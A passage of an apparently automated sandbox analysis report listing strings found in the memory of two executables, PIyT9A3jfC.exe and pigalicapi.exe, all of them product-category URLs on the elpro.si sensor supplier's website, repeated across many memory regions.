PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/rotronic/vlaga-rotronic-merilniki-relativne-vlaznosti-rotron
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/dodatki/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/elektronika/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/merilna-celica/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/merilni-pin/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/natezna-merilna-celica/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/obrocni-pretvorniki-sile/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/posebni-pretvorniki-sile/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-nagiba/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-sile-napetosti-kompresije/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/senzorji-tlacne-sile/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/senzorji-sile/upogibni-nosilci-strizni-nosilci/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/temperaturna-tipala-elpro/basic-temperaturna-tipala/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 